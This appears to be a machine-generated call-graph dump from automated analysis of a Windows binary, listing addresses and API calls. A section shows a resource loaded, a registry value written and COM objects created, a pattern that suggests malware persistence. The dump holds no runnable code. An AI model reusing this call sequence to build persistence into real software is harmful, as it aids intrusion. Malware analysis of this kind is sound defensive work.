7a7989 10881->10883 10885 7a1517 _abort 26 API calls 10883->10885 10885->10892 10889 7a79bb 10911 7a8664 10889->10911 10893 7a2096 _free 20 API calls 10893->10892 10895 7a7689 10894->10895 10896 7a7685 10894->10896 10895->10896 10897 7a7951 26 API calls 10895->10897 10900 7a77ff 10896->10900 10898 7a76a9 10897->10898 10926 7a812c 10898->10926 10901 7a7826 10900->10901 10902 7a7815 10900->10902 10904 7a7951 10901->10904 10902->10901 10903 7a2096 _free 20 API calls 10902->10903 10903->10901 10905 7a795d 10904->10905 10906 7a7972 10904->10906 10907 7a15d3 _free 20 API calls 10905->10907 10906->10889 10908 7a7962 10907->10908 10909 7a1517 _abort 26 API calls 10908->10909 10910 7a796d 10909->10910 10910->10889 10912 7a8688 10911->10912 10913 7a8673 10911->10913 10915 7a86c3 10912->10915 10919 7a86af 10912->10919 10914 7a15c0 __dosmaperr 20 API calls 10913->10914 10916 7a8678 10914->10916 10917 7a15c0 __dosmaperr 20 API calls 10915->10917 10918 7a15d3 _free 20 API calls 10916->10918 10920 7a86c8 10917->10920 10923 7a79c1 10918->10923 11099 7a863c 10919->11099 10922 7a15d3 _free 20 API calls 10920->10922 10924 7a86d0 10922->10924 10923->10892 10923->10893 10925 7a1517 _abort 26 API calls 10924->10925 10925->10923 10927 7a8138 _abort 10926->10927 10928 7a8158 10927->10928 10929 7a8140 10927->10929 10931 7a81f6 10928->10931 10935 7a818d 10928->10935 10951 7a15c0 10929->10951 10933 7a15c0 __dosmaperr 20 API calls 10931->10933 10936 7a81fb 10933->10936 10934 7a15d3 _free 20 API calls 10945 7a814d _abort 10934->10945 10954 7a8423 RtlEnterCriticalSection 10935->10954 10938 7a15d3 _free 20 API calls 10936->10938 10940 7a8203 10938->10940 10939 7a8193 10941 7a81af 10939->10941 10942 7a81c4 10939->10942 10943 7a1517 _abort 26 API calls 10940->10943 10944 7a15d3 _free 20 API calls 10941->10944 10955 7a8217 10942->10955 10943->10945 10947 7a81b4 10944->10947 10945->10896 10949 7a15c0 __dosmaperr 20 API calls 10947->10949 10948 7a81bf 11006 7a81ee 10948->11006 10949->10948 10952 7a18df _abort 20 API calls 10951->10952 10953 7a15c5 10952->10953 10953->10934 10954->10939 10956 7a8245 10955->10956 10993 7a823e 10955->10993 10957 7a8268 10956->10957 10958 7a8249 10956->10958 10962 7a82b9 10957->10962 10963 7a829c 10957->10963 10959 7a15c0 __dosmaperr 20 API calls 10958->10959 10961 7a824e 10959->10961 10960 7a4c0d _abort 5 API calls 10964 7a841f 10960->10964 10965 7a15d3 _free 20 API calls 10961->10965 10966 7a82cf 10962->10966 11009 7a8838 10962->11009 10967 7a15c0 __dosmaperr 20 API calls 10963->10967 10964->10948 10968 7a8255 10965->10968 11012 7a7dbc 10966->11012 10971 7a82a1 10967->10971 10973 7a1517 _abort 26 API calls 10968->10973 10972 7a15d3 _free 20 API calls 10971->10972 10975 7a82a9 10972->10975 10973->10993 10978 7a1517 _abort 26 API calls 10975->10978 10976 7a82dd 10981 7a8303 10976->10981 10982 7a82e1 10976->10982 10977 7a8316 10979 7a832a 10977->10979 10980 7a8370 WriteFile 10977->10980 10978->10993 10985 7a8332 10979->10985 10986 7a8360 10979->10986 10983 7a8393 GetLastError 10980->10983 10989 7a82f9 10980->10989 11024 7a7b9c GetConsoleCP 10981->11024 10987 7a83d7 10982->10987 11019 7a7d4f 10982->11019 10983->10989 10990 7a8350 10985->10990 10991 7a8337 10985->10991 11050 7a7e32 10986->11050 10987->10993 10994 7a15d3 _free 20 API calls 10987->10994 10989->10987 10989->10993 10997 7a83b3 10989->10997 11042 7a7fff 10990->11042 10991->10987 11035 7a7f11 10991->11035 10993->10960 10996 7a83fc 10994->10996 10999 7a15c0 __dosmaperr 20 API calls 10996->10999 11000 7a83ba 10997->11000 11001 7a83ce 10997->11001 10999->10993 11002 7a15d3 _free 20 API calls 11000->11002 11057 7a159d 11001->11057 11004 7a83bf 11002->11004 11005 7a15c0 __dosmaperr 20 API calls 11004->11005 11005->10993 11098 7a8446 RtlLeaveCriticalSection 11006->11098 11008 7a81f4 11008->10945 11062 7a87ba 11009->11062 11084 7a8564 11012->11084 11014 7a7dcc 11015 7a7dd1 11014->11015 11016 7a185b _abort 38 API calls 11014->11016 11015->10976 11015->10977 11018 7a7df4 11016->11018 11017 7a7e12 GetConsoleMode 11017->11015 11018->11015 11018->11017 11020 7a7da9 11019->11020 11022 7a7d74 11019->11022 11020->10989 11021 7a8853 WriteConsoleW CreateFileW 11021->11022 11022->11020 11022->11021 11023 7a7dab GetLastError 11022->11023 11023->11020 11032 7a7bff 11024->11032 11034 7a7d11 11024->11034 11025 7a4c0d _abort 5 API calls 11026 7a7d4b 11025->11026 11026->10989 11028 7a7937 40 API calls __fassign 11028->11032 11029 7a7c85 WideCharToMultiByte 11030 7a7cab WriteFile 11029->11030 11029->11034 11031 7a7d34 GetLastError 11030->11031 11030->11032 11031->11034 11032->11028 11032->11029 11033 7a7cdc WriteFile 11032->11033 11032->11034 11093 7a304d 11032->11093 11033->11031 11033->11032 11034->11025 11040 7a7f20 11035->11040 11036 7a7fe2 11037 7a4c0d _abort 5 API calls 11036->11037 11041 7a7ffb 11037->11041 11038 7a7f9e WriteFile 11039 7a7fe4 GetLastError 11038->11039 11038->11040 11039->11036 11040->11036 11040->11038 11041->10989 11047 7a800e 11042->11047 11043 7a8119 11044 7a4c0d _abort 5 API calls 11043->11044 11045 7a8128 11044->11045 11045->10989 11046 7a8090 WideCharToMultiByte 11048 7a8111 GetLastError 11046->11048 11049 7a80c5 WriteFile 11046->11049 11047->11043 11047->11046 11047->11049 11048->11043 11049->11047 11049->11048 11055 7a7e41 11050->11055 11051 7a7ef4 11052 7a4c0d _abort 5 API calls 11051->11052 11054 7a7f0d 11052->11054 11053 7a7eb3 WriteFile 11053->11055 11056 7a7ef6 GetLastError 11053->11056 11054->10989 11055->11051 11055->11053 11056->11051 11058 7a15c0 __dosmaperr 20 API calls 11057->11058 11059 7a15a8 _free 11058->11059 11060 7a15d3 _free 20 API calls 11059->11060 11061 7a15bb 11060->11061 11061->10993 11071 7a84fa 11062->11071 11064 7a87cc 11065 7a87d4 11064->11065 11066 7a87e5 SetFilePointerEx 11064->11066 11067 7a15d3 _free 20 API calls 11065->11067 11068 7a87fd GetLastError 11066->11068 11070 7a87d9 11066->11070 11067->11070 11069 7a159d __dosmaperr 20 API calls 11068->11069 11069->11070 11070->10966 11072 7a851c 11071->11072 11073 7a8507 11071->11073 11075 7a15c0 __dosmaperr 20 API calls 11072->11075 11077 7a8541 11072->11077 11074 7a15c0 __dosmaperr 20 API calls 11073->11074 11076 7a850c 11074->11076 11078 7a854c 11075->11078 11079 7a15d3 _free 20 API calls 11076->11079 11077->11064 11080 7a15d3 _free 20 API calls 11078->11080 11081 7a8514 11079->11081 11082 7a8554 11080->11082 11081->11064 11083 7a1517 _abort 26 API calls 11082->11083 11083->11081 11085 7a857e 11084->11085 11086 7a8571 11084->11086 11088 7a858a 11085->11088 11089 7a15d3 _free 20 API calls 11085->11089 11087 7a15d3 _free 20 API calls 11086->11087 11090 7a8576 11087->11090 11088->11014 11091 7a85ab 11089->11091 11090->11014 11092 7a1517 _abort 26 API calls 11091->11092 11092->11090 11094 7a185b _abort 38 API calls 11093->11094 11095 7a3058 11094->11095 11096 7a1964 __fassign 38 API calls 11095->11096 11097 7a3068 11096->11097 11097->11032 11098->11008 11102 7a85ba 11099->11102 11101 7a8660 11101->10923 11103 7a85c6 _abort 11102->11103 11113 7a8423 RtlEnterCriticalSection 11103->11113 11105 7a85d4 11106 7a85fb 11105->11106 11107 7a8606 11105->11107 11114 7a86e3 11106->11114 11109 7a15d3 _free 20 API calls 11107->11109 11110 7a8601 11109->11110 11129 7a8630 11110->11129 11112 7a8623 _abort 11112->11101 11113->11105 11115 7a84fa 26 API calls 11114->11115 11118 7a86f3 11115->11118 11116 7a86f9 11132 7a8469 11116->11132 11118->11116 11120 7a84fa 26 API calls 11118->11120 11128 7a872b 11118->11128 11119 7a84fa 26 API calls 11122 7a8737 CloseHandle 11119->11122 11121 7a8722 11120->11121 11125 7a84fa 26 API calls 11121->11125 11122->11116 11126 7a8743 GetLastError 11122->11126 11123 7a8773 11123->11110 11125->11128 11126->11116 11127 7a159d __dosmaperr 20 API calls 11127->11123 11128->11116 11128->11119 11141 7a8446 RtlLeaveCriticalSection 11129->11141 11131 7a863a 11131->11112 11133 7a8478 11132->11133 11134 7a84df 11132->11134 11133->11134 11139 7a84a2 11133->11139 11135 7a15d3 _free 20 API calls 11134->11135 11136 7a84e4 11135->11136 11137 7a15c0 __dosmaperr 20 API calls 11136->11137 11138 7a84cf 11137->11138 11138->11123 11138->11127 11139->11138 11140 7a84c9 SetStdHandle 11139->11140 11140->11138 11141->11131 11221 7a22b5 11222 7a20ef _abort 5 API calls 11221->11222 11223 7a22dc 11222->11223 11224 7a22fa InitializeCriticalSectionAndSpinCount 11223->11224 11225 7a22e5 11223->11225 11224->11225 11226 7a4c0d _abort 5 API calls 11225->11226 11227 7a2311 11226->11227 11199 470594 11200 4705a0 11199->11200 11200->11199 11201 4705e1 11200->11201 11202 4706b4 GetPEB 11200->11202 11248 767b23 11249 767b2b 11248->11249 11252 765f10 11248->11252 11250 766084 SetFilePointerEx 11250->11252 11251 765d90 11252->11248 11252->11250 11252->11251 10105 7697e0 10112 768645 10105->10112 10113 768e31 10105->10113 10106 768e26 10141 76b180 10106->10141 10108 7698be GetFileSize 10108->10113 10111 765d20 VirtualAlloc VirtualFree 10114 76848b 10111->10114 10113->10105 10113->10106 10113->10108 10113->10112 10113->10114 10115 76987f ReadFile 10113->10115 10116 769a1f 10113->10116 10120 7689b0 10113->10120 10122 765f10 10113->10122 10114->10111 10114->10112 10126 7684c0 10114->10126 10132 771d60 10114->10132 10115->10113 10116->10112 10118 769a29 SetFilePointerEx 10116->10118 10118->10112 10119 7684c0 2 API calls 10119->10120 10120->10112 10120->10119 10136 765d20 10120->10136 10124 765f13 10122->10124 10123 766084 SetFilePointerEx 10123->10124 10124->10122 10124->10123 10125 765d90 10124->10125 10125->10113 10130 76848b 10126->10130 10127 768645 10127->10114 10128 765d20 VirtualAlloc VirtualFree 10128->10130 10129 771d60 2 API calls 10129->10130 10130->10126 10130->10127 10130->10128 10130->10129 10131 7684c0 2 API calls 10130->10131 10131->10126 10133 771d76 10132->10133 10135 771d62 10132->10135 10133->10114 10134 765d20 2 API calls 10134->10135 10135->10114 10135->10133 10135->10134 10138 765d22 10136->10138 10137 765d39 VirtualAlloc 10137->10138 10138->10120 10138->10137 10140 765d46 VirtualFree 10138->10140 10140->10120 10142 76b2a3 10141->10142 10143 76b214 10142->10143 10144 76b2a7 SetFilePointerEx 10142->10144 10147 76b196 10143->10147 10149 76b247 10143->10149 10145 76b1c6 10144->10145 10146 76b1df 10144->10146 10145->10146 10152 76b2e0 WriteFile 10145->10152 10146->10113 10147->10145 10148 76b3a6 10147->10148 10150 76b3b2 10148->10150 10151 76b328 SetFilePointerEx 10148->10151 10149->10151 10153 76b0d0 SetFilePointerEx 10149->10153 10154 76b253 10149->10154 10150->10113 10151->10113 10152->10113 10155 76b054 10153->10155 10154->10113 10155->10113 10214 401798 10217 4017a5 FindResourceA 10214->10217 10218 4017c5 SizeofResource 10217->10218 10219 40179d ExitProcess 10217->10219 10218->10219 10220 4017d8 LoadResource 10218->10220 10220->10219 10221 4017e4 LockResource RegOpenKeyExW 10220->10221 10221->10219 10222 40180b RegSetValueExW 10221->10222 10222->10219 10223 401822 10222->10223 10233 401868 GetProcessHeap HeapAlloc StrCpyW 10223->10233 10225 401827 10271 401674 SysAllocString SysAllocString CoInitializeEx 10225->10271 10227 401841 10280 40112f GetCurrentProcess IsWow64Process 10227->10280 10231 401854 10231->10219 10293 40151a SysAllocString SysAllocString CoInitializeEx 10231->10293 10303 401159 10233->10303 10235 401893 10236 4018c5 StrCatW StrCatW 10235->10236 10237 40189d StrCatW 10235->10237 10306 4019e1 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 10236->10306 10238 40112f 2 API calls 10237->10238 10240 4018aa StrCatW StrCatW 10238->10240 10240->10236 10245 401986 6 API calls 10246 4018f0 10245->10246 10247 401986 6 API calls 10246->10247 10248 4018fc 10247->10248 10249 401986 6 API calls 10248->10249 10250 401908 10249->10250 10251 401986 6 API calls 10250->10251 10252 401914 10251->10252 10253 401986 6 API calls 10252->10253 10254 401920 10253->10254 10255 401986 6 API calls 10254->10255 10256 40192c 10255->10256 10257 401986 6 API calls 10256->10257 10258 401938 10257->10258 10259 401986 6 API calls 10258->10259 10260 401944 10259->10260 10261 401986 6 API calls 10260->10261 10262 401950 10261->10262 10263 401986 6 API calls 10262->10263 10264 40195c 10263->10264 10265 401986 6 API calls 10264->10265 10266 401968 10265->10266 10267 401986 6 API calls 10266->10267 10268 401974 10267->10268 10269 401986 6 API calls 10268->10269 10270 401980 10269->10270 10270->10225 10272 401782 10271->10272 10273 4016a7 CoInitializeSecurity 10271->10273 10276 401785 SysFreeString SysFreeString 10272->10276 10274 4016c8 CoCreateInstance 10273->10274 10275 4016bd 10273->10275 10277 40172d CoUninitialize 10274->10277 10278 4016ea VariantInit 10274->10278 10275->10274 10275->10277 10276->10227 10277->10276 10278->10277 10281 40114e 10280->10281 10282 4011ad 7 API calls 10281->10282 10283 4014f0 10282->10283 10284 401209 CoInitializeSecurity 10282->10284 10285 4014f3 6 API calls 10283->10285 10286 40122a CoCreateInstance 10284->10286 10287 40121f 10284->10287 10285->10231 10288 401444 CoUninitialize 10286->10288 10289 40124c VariantInit 10286->10289 10287->10286 10287->10288 10288->10285 10291 40128f 10289->10291 10291->10288 10292 4013dd VariantInit VariantInit VariantInit 10291->10292 10292->10288 10294 40154d CoInitializeSecurity 10293->10294 10295 40165f SysFreeString SysFreeString 10293->10295 10296 401563 10294->10296 10297 40156e CoCreateInstance 10294->10297 10295->10219 10296->10297 10298 401659 SysFreeString 10296->10298 10297->10298 10299 401590 VariantInit 10297->10299 10298->10295 10300 4015d3 10299->10300 10301 40162b 10300->10301 10302 401605 VariantInit 10300->10302 10301->10298 10302->10301 10326 40118e GetModuleHandleA 10303->10326 10305 401178 10305->10235 10329 401000 CryptAcquireContextW 10306->10329 10309 401a37 StrStrIW 10316 401a9d 10309->10316 10310 4018d8 10319 401986 lstrlenW 10310->10319 10311 401b71 6 API calls 10311->10310 10312 401a57 StrStrIW StrNCatW StrCatW 10313 401b41 StrCatW StrStrIW 10312->10313 10312->10316 10313->10316 10314 401afb StrCatW StrNCatW 10318 401b18 StrCatW 10314->10318 10315 401b27 StrCatW 10315->10313 10315->10316 10316->10311 10316->10312 10316->10314 10316->10315 10317 401adf StrCatW StrCatW 10316->10317 10317->10318 10318->10315 10332 40104b 10319->10332 10322 4019b3 StrStrIW 10323 4019bf 10322->10323 10325 4018e4 10322->10325 10324 4019c0 StrStrIW 10323->10324 10324->10324 10324->10325 10325->10245 10327 4011aa 10326->10327 10328 40119d GetProcAddress 10326->10328 10327->10305 10328->10305 10330 401044 10329->10330 10331 401028 CryptGenRandom CryptReleaseContext 10329->10331 10330->10309 10330->10310 10331->10330 10333 401000 3 API calls 10332->10333 10334 401076 10333->10334 10334->10322 10334->10325 10873 7658ac 10874 7658b6 10873->10874 10875 765d20 2 API calls 10874->10875 10876 7658be 10874->10876 10875->10876 11175 7a8de0 11176 7a8df9 __startOneArgErrorHandling 11175->11176 11177 7a8e22 __startOneArgErrorHandling 11176->11177 11179 7a36d2 11176->11179 11180 7a370b __startOneArgErrorHandling 11179->11180 11181 7a39a3 __raise_exc RaiseException 11180->11181 11182 7a3732 __startOneArgErrorHandling 11180->11182 11181->11182 11183 7a3775 11182->11183 11184 7a3750 11182->11184 11185 7a3c94 __startOneArgErrorHandling 20 API calls 11183->11185 11190 7a3cc3 11184->11190 11187 7a3770 __startOneArgErrorHandling 11185->11187 11188 7a4c0d _abort 5 API calls 11187->11188 11189 7a3799 11188->11189 11189->11177 11191 7a3cd2 11190->11191 11192 7a3d46 __startOneArgErrorHandling 11191->11192 11193 7a3cf1 __startOneArgErrorHandling 11191->11193 11194 7a3c94 __startOneArgErrorHandling 20 API calls 11192->11194 11195 7a3655 __startOneArgErrorHandling 5 API calls 11193->11195 11198 7a3d3f 11194->11198 11196 7a3d32 11195->11196 11197 7a3c94 __startOneArgErrorHandling 20 API calls 11196->11197 11196->11198 11197->11198 11198->11187 10377 7a2c1a 10397 7a185b GetLastError 10377->10397 10379 7a2c27 10417 7a2d39 10379->10417 10381 7a2c2f 10426 7a29ae 10381->10426 10384 7a2c46 10387 7a2c89 10389 7a2096 _free 20 API calls 10387->10389 10389->10384 10391 7a2c84 10392 7a15d3 _free 20 API calls 10391->10392 10392->10387 10393 7a2ccd 10393->10387 10450 7a2884 10393->10450 10394 7a2ca1 10394->10393 10395 7a2096 _free 20 API calls 10394->10395 10395->10393 10398 7a1877 10397->10398 10399 7a1871 10397->10399 10401 7a2039 _abort 20 API calls 10398->10401 10403 7a18c6 SetLastError 10398->10403 10400 7a2206 _abort 11 API calls 10399->10400 10400->10398 10402 7a1889 10401->10402 10404 7a225c _abort 11 API calls 10402->10404 10405 7a1891 10402->10405 10403->10379 10406 7a18a6 10404->10406 10407 7a2096 _free 20 API calls 10405->10407 10406->10405 10409 7a18ad 10406->10409 10408 7a1897 10407->10408 10410 7a18d2 SetLastError 10408->10410 10411 7a1797 _abort 20 API calls 10409->10411 10453 7a1ff6 10410->10453 10412 7a18b8 10411->10412 10414 7a2096 _free 20 API calls 10412->10414 10416 7a18bf 10414->10416 10416->10403 10416->10410 10418 7a2d45 _abort 10417->10418 10419 7a185b _abort 38 API calls 10418->10419 10424 7a2d4f 10419->10424 10421 7a2dd3 _abort 10421->10381 10423 7a1ff6 _abort 38 API calls 10423->10424 10424->10421 10424->10423 10425 7a2096 _free 20 API calls 10424->10425 10595 7a2813 RtlEnterCriticalSection 10424->10595 10596 7a2dca 10424->10596 10425->10424 10600 79fd79 10426->10600 10429 7a29cf GetOEMCP 10432 7a29f8 10429->10432 10430 7a29e1 10431 7a29e6 GetACP 10430->10431 10430->10432 10431->10432 10432->10384 10433 7a32fa 10432->10433 10434 7a3338 10433->10434 10435 7a3308 _abort 10433->10435 10437 7a15d3 _free 20 API calls 10434->10437 10435->10434 10436 7a3323 RtlAllocateHeap 10435->10436 10439 7a4356 _abort 7 API calls 10435->10439 10436->10435 10438 7a2c57 10436->10438 10437->10438 10438->10387 10440 7a2ddb 10438->10440 10439->10435 10441 7a29ae 40 API calls 10440->10441 10442 7a2dfa 10441->10442 10445 7a2e4b IsValidCodePage 10442->10445 10447 7a2e01 10442->10447 10449 7a2e70 _abort 10442->10449 10443 7a4c0d _abort 5 API calls 10444 7a2c7c 10443->10444 10444->10391 10444->10394 10446 7a2e5d GetCPInfo 10445->10446 10445->10447 10446->10447 10446->10449 10447->10443 10751 7a2a86 GetCPInfo 10449->10751 10824 7a2841 10450->10824 10452 7a28a8 10452->10387 10464 7a412e 10453->10464 10457 7a2010 IsProcessorFeaturePresent 10460 7a201b 10457->10460 10458 7a202e 10492 7a402c 10458->10492 10459 7a2006 10459->10457 10459->10458 10462 7a1361 _abort 8 API calls 10460->10462 10462->10458 10495 7a409c 10464->10495 10467 7a414e 10468 7a415a _abort 10467->10468 10469 7a4181 _abort 10468->10469 10470 7a18df _abort 20 API calls 10468->10470 10473 7a4187 _abort 10468->10473 10471 7a41d3 10469->10471 10469->10473 10477 7a41b6 10469->10477 10470->10469 10472 7a15d3 _free 20 API calls 10471->10472 10474 7a41d8 10472->10474 10478 7a41ff 10473->10478 10509 7a2813 RtlEnterCriticalSection 10473->10509 10475 7a1517 _abort 26 API calls 10474->10475 10475->10477 10477->10459 10479 7a425e 10478->10479 10482 7a4256 10478->10482 10489 7a4289 10478->10489 10510 7a282a RtlLeaveCriticalSection 10478->10510 10479->10489 10511 7a4145 10479->10511 10484 7a402c _abort 28 API calls 10482->10484 10484->10479 10486 7a185b _abort 38 API calls 10490 7a42ec 10486->10490 10488 7a4145 _abort 38 API calls 10488->10489 10514 7a430e 10489->10514 10490->10477 10491 7a185b _abort 38 API calls 10490->10491 10491->10477 10519 7a3e24 10492->10519 10494 7a2038 10498 7a4042 10495->10498 10497 7a1ffb 10497->10459 10497->10467 10499 7a404e _abort 10498->10499 10504 7a2813 RtlEnterCriticalSection 10499->10504 10501 7a405c 10505 7a4090 10501->10505 10503 7a4083 _abort 10503->10497 10504->10501 10508 7a282a RtlLeaveCriticalSection 10505->10508 10507 7a409a 10507->10503 10508->10507 10509->10478 10510->10482 10512 7a185b _abort 38 API calls 10511->10512 10513 7a414a 10512->10513 10513->10488 10515 7a42dd 10514->10515 10516 7a4314 10514->10516 10515->10477 10515->10486 10515->10490 10518 7a282a RtlLeaveCriticalSection 10516->10518 10518->10515 10520 7a3e30 _abort 10519->10520 10521 7a3e48 10520->10521 10538 7a3f7e GetModuleHandleW 10520->10538 10547 7a2813 RtlEnterCriticalSection 10521->10547 10525 7a3eee 10555 7a3f2e 10525->10555 10528 7a3ec5 10530 7a3edd 10528->10530 10551 7a47ae 10528->10551 10535 7a47ae _abort 5 API calls 10530->10535 10531 7a3f37 10531->10494 10535->10525 10536 7a3e50 10536->10525 10536->10528 10548 7a49a3 10536->10548 10539 7a3e3c 10538->10539 10539->10521 10540 7a3fc2 GetModuleHandleExW 10539->10540 10541 7a3fec GetProcAddress 10540->10541 10545 7a4001 10540->10545 10541->10545 10542 7a401e 10544 7a4c0d _abort 5 API calls 10542->10544 10543 7a4015 FreeLibrary 10543->10542 10546 7a4028 10544->10546 10545->10542 10545->10543 10546->10521 10547->10536 10566 7a485b 10548->10566 10552 7a47dd 10551->10552 10553 7a4c0d _abort 5 API calls 10552->10553 10554 7a4806 10553->10554 10554->10530 10588 7a282a RtlLeaveCriticalSection 10555->10588 10557 7a3f07 10557->10531 10558 7a3f3d 10557->10558 10589 7a23fb 10558->10589 10561 7a3f6b 10564 7a3fc2 _abort 8 API calls 10561->10564 10562 7a3f4b GetPEB 10562->10561 10563 7a3f5b GetCurrentProcess TerminateProcess 10562->10563 10563->10561 10565 7a3f73 ExitProcess 10564->10565 10569 7a480a 10566->10569 10568 7a487f 10568->10528 10570 7a4816 _abort 10569->10570 10577 7a2813 RtlEnterCriticalSection 10570->10577 10572 7a4824 10578 7a4883 10572->10578 10576 7a4842 _abort 10576->10568 10577->10572 10579 7a48a3 10578->10579 10582 7a48ab 10578->10582 10580 7a4c0d _abort 5 API calls 10579->10580 10581 7a4831 10580->10581 10584 7a484f 10581->10584 10582->10579 10583 7a2096 _free 20 API calls 10582->10583 10583->10579 10587 7a282a RtlLeaveCriticalSection 10584->10587 10586 7a4859 10586->10576 10587->10586 10588->10557 10590 7a2420 10589->10590 10594 7a2416 10589->10594 10591 7a20ef _abort 5 API calls 10590->10591 10591->10594 10592 7a4c0d _abort 5 API calls 10593 7a247e 10592->10593 10593->10561 10593->10562 10594->10592 10595->10424 10599 7a282a RtlLeaveCriticalSection 10596->10599 10598 7a2dd1 10598->10424 10599->10598 10601 79fd8c 10600->10601 10602 79fd96 10600->10602 10601->10429 10601->10430 10602->10601 10603 7a185b _abort 38 API calls 10602->10603 10604 79fdb7 10603->10604 10608 7a1964 10604->10608 10609 79fdd0 10608->10609 10610 7a1977 10608->10610 10612 7a1991 10609->10612 10610->10609 10616 7a274c 10610->10616 10613 7a19a4 10612->10613 10615 7a19b9 10612->10615 10614 7a2d39 __fassign 38 API calls 10613->10614 10613->10615 10614->10615 10615->10601 10617 7a2758 _abort 10616->10617 10618 7a185b _abort 38 API calls 10617->10618 10619 7a2761 10618->10619 10622 7a27af _abort 10619->10622 10628 7a2813 RtlEnterCriticalSection 10619->10628 10621 7a277f 10629 7a27c3 10621->10629 10622->10609 10627 7a1ff6 _abort 38 API calls 10627->10622 10628->10621 10630 7a27d1 __fassign 10629->10630 10632 7a2793 10629->10632 10630->10632 10636 7a24ff 10630->10636 10633 7a27b2 10632->10633 10750 7a282a RtlLeaveCriticalSection 10633->10750 10635 7a27a6 10635->10622 10635->10627 10637 7a2515 10636->10637 10638 7a257f 10636->10638 10637->10638 10641 7a2548 10637->10641 10645 7a2096 _free 20 API calls 10637->10645 10640 7a2096 _free 20 API calls 10638->10640 10663 7a25cd 10638->10663 10642 7a25a1 10640->10642 10643 7a256a 10641->10643 10651 7a2096 _free 20 API calls 10641->10651 10644 7a2096 _free 20 API calls 10642->10644 10647 7a2096 _free 20 API calls 10643->10647 10646 7a25b4 10644->10646 10650 7a253d 10645->10650 10652 7a2096 _free 20 API calls 10646->10652 10653 7a2574 10647->10653 10648 7a263b 10655 7a2096 _free 20 API calls 10648->10655 10649 7a25db 10649->10648 10662 7a2096 20 API calls _free 10649->10662 10664 7a3073 10650->10664 10657 7a255f 10651->10657 10658 7a25c2 10652->10658 10654 7a2096 _free 20 API calls 10653->10654 10654->10638 10659 7a2641 10655->10659 10692 7a3171 10657->10692 10661 7a2096 _free 20 API calls 10658->10661 10659->10632 10661->10663 10662->10649 10704 7a2672 10663->10704 10665 7a316d 10664->10665 10666 7a3084 10664->10666 10665->10641 10667 7a3095 10666->10667 10668 7a2096 _free 20 API calls 10666->10668 10669 7a30a7 10667->10669 10670 7a2096 _free 20 API calls 10667->10670 10668->10667 10671 7a30b9 10669->10671 10673 7a2096 _free 20 API calls 10669->10673 10670->10669 10672 7a30cb 10671->10672 10674 7a2096 _free 20 API calls 10671->10674 10675 7a30dd 10672->10675 10676 7a2096 _free 20 API calls 10672->10676 10673->10671 10674->10672 10677 7a30ef 10675->10677 10678 7a2096 _free 20 API calls 10675->10678 10676->10675 10679 7a3101 10677->10679 10681 7a2096 _free 20 API calls 10677->10681 10678->10677 10680 7a3113 10679->10680 10682 7a2096 _free 20 API calls 10679->10682 10683 7a3125 10680->10683 10684 7a2096 _free 20 API calls 10680->10684 10681->10679 10682->10680 10685 7a3137 10683->10685 10686 7a2096 _free 20 API calls 10683->10686 10684->10683 10687 7a3149 10685->10687 10689 7a2096 _free 20 API calls 10685->10689 10686->10685 10688 7a315b 10687->10688 10690 7a2096 _free 20 API calls 10687->10690 10688->10665 10691 7a2096 _free 20 API calls 10688->10691 10689->10687 10690->10688 10691->10665 10693 7a317e 10692->10693 10694 7a31d6 10692->10694 10695 7a318e 10693->10695 10696 7a2096 _free 20 API calls 10693->10696 10694->10643 10697 7a31a0 10695->10697 10698 7a2096 _free 20 API calls 10695->10698 10696->10695 10699 7a31b2 10697->10699 10700 7a2096 _free 20 API calls 10697->10700 10698->10697 10701 7a31c4 10699->10701 10702 7a2096 _free 20 API calls 10699->10702 10700->10699 10701->10694 10703 7a2096 _free 20 API calls 10701->10703 10702->10701 10703->10694 10705 7a267f 10704->10705 10709 7a269d 10704->10709 10705->10709 10710 7a3216 10705->10710 10708 7a2096 _free 20 API calls 10708->10709 10709->10649 10711 7a2697 10710->10711 10712 7a3227 10710->10712 10711->10708 10746 7a31da 10712->10746 10715 7a31da __fassign 20 API calls 10716 7a323a 10715->10716 10717 7a31da __fassign 20 API calls 10716->10717 10718 7a3245 10717->10718 10719 7a31da __fassign 20 API calls 10718->10719 10720 7a3250 10719->10720 10721 7a31da __fassign 20 API calls 10720->10721 10722 7a325e 10721->10722 10723 7a2096 _free 20 API calls 10722->10723 10724 7a3269 10723->10724 10725 7a2096 _free 20 API calls 10724->10725 10726 7a3274 10725->10726 10727 7a2096 _free 20 API calls 10726->10727 10728 7a327f 10727->10728 10729 7a31da __fassign 20 API calls 10728->10729 10730 7a328d 10729->10730 10731 7a31da __fassign 20 API calls 10730->10731 10732 7a329b 10731->10732 10733 7a31da __fassign 20 API calls 10732->10733 10734 7a32ac 10733->10734 10735 7a31da __fassign 20 API calls 10734->10735 10736 7a32ba 10735->10736 10737 7a31da __fassign 20 API calls 10736->10737 10738 7a32c8 10737->10738 10739 7a2096 _free 20 API calls 10738->10739 10740 7a32d3 10739->10740 10741 7a2096 _free 20 API calls 10740->10741 10742 7a32de 10741->10742 10743 7a2096 _free 20 API calls 10742->10743 10744 7a32e9 10743->10744 10745 7a2096 _free 20 API calls 10744->10745 10745->10711 10747 7a3211 10746->10747 10748 7a3201 10746->10748 10747->10715 10748->10747 10749 7a2096 _free 20 API calls 10748->10749 10749->10748 10750->10635 10756 7a2ac0 10751->10756 10760 7a2b6a 10751->10760 10753 7a4c0d _abort 5 API calls 10755 7a2c16 10753->10755 10755->10447 10761 7a34ff 10756->10761 10759 7a4706 43 API calls 10759->10760 10760->10753 10762 79fd79 __fassign 38 API calls 10761->10762 10763 7a351f MultiByteToWideChar 10762->10763 10765 7a355d 10763->10765 10773 7a35f5 10763->10773 10767 7a357e _abort 10765->10767 10768 7a32fa 21 API calls 10765->10768 10766 7a4c0d _abort 5 API calls 10769 7a2b21 10766->10769 10770 7a35ef 10767->10770 10772 7a35c3 MultiByteToWideChar 10767->10772 10768->10767 10775 7a4706 10769->10775 10780 7a361c 10770->10780 10772->10770 10774 7a35df GetStringTypeW 10772->10774 10773->10766 10774->10770 10776 79fd79 __fassign 38 API calls 10775->10776 10777 7a4719 10776->10777 10784 7a44e9 10777->10784 10781 7a3639 10780->10781 10782 7a3628 10780->10782 10781->10773 10782->10781 10783 7a2096 _free 20 API calls 10782->10783 10783->10781 10785 7a4504 10784->10785 10786 7a452a MultiByteToWideChar 10785->10786 10787 7a46de 10786->10787 10788 7a4554 10786->10788 10789 7a4c0d _abort 5 API calls 10787->10789 10791 7a32fa 21 API calls 10788->10791 10795 7a4575 10788->10795 10790 7a2b42 10789->10790 10790->10759 10791->10795 10792 7a45be MultiByteToWideChar 10793 7a462a 10792->10793 10794 7a45d7 